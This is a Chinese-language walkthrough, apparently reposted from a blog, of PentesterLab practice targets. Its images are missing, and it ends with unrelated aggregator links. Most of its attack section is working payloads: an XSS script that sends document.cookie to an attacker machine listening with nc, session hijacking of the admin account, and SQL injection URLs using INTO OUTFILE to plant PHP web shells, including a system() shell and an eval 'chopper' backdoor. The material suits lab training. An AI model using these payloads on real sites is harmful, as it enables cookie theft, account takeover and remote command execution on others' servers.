web 攻击靶机解题过程
sql注入靶機攻擊過程請參考
https://pentesterlab.com/exercises/from_sqli_to_shell/course
http://www.sohu.com/a/126855490_472906
xss靶機的攻擊過程請參考
https://pentesterlab.com/exercises/xss_and_mysql_file/course
實驗一
?
?
?
?
再用菜刀連接即可
?
?
實驗二
?
在機器上打開網頁:
?
測試下是否存在xss漏洞。
發現提交后有彈出框:
?
進一步構造內容
<script>document.write('<img src="http://192.168.179.142/?'+document.cookie+' "/>');</script>同時在192.168.179.142機器上用nc打開80端口。
?在原來機器上登陸admin賬戶,密碼是p4ssw0rd
?
獲取到cookie信息。
復制下cookie,在142機器上打開評論所在的網頁。并修改cookie的值為剛才復制的值。
刷新下頁面,發現已經已admin的身份登錄進頁面中。
進入管理界面后,發現博客編輯界面存在sql注入漏洞。
?
可以讀取passwd文件,但是不能讀取shadow文件。我們嘗試能不能創建一個文件。
在編輯頁面發現錯誤提示中有/var/www/classes 目錄,
?
在查看源碼時發現有css目錄
嘗試后發現/var/www/css 目錄可寫。
于是構造語句:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22
然后打開
http://192.168.179.130/css/s.php
顯示:
說明s.php文件成功寫入到/var/www/css 目錄,下面將
<?php system($_GET['c']); ?>
寫入z.php中,構造url為:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22
訪問z.php,并使用uname -a獲取系統信息??梢赃h程執行命令。
下面寫入一句話木馬,構造url:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22
菜刀鏈接:
?
轉載于:https://www.cnblogs.com/p201521410046/p/8906282.html
與50位技術專家面對面20年技術見證,附贈技術全景圖總結
以上是生活随笔為你收集整理的web 攻击靶机解题过程的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 划船训练常见错误:含胸驼背肩胛骨活动不足
- 下一篇: Android中onInterceptT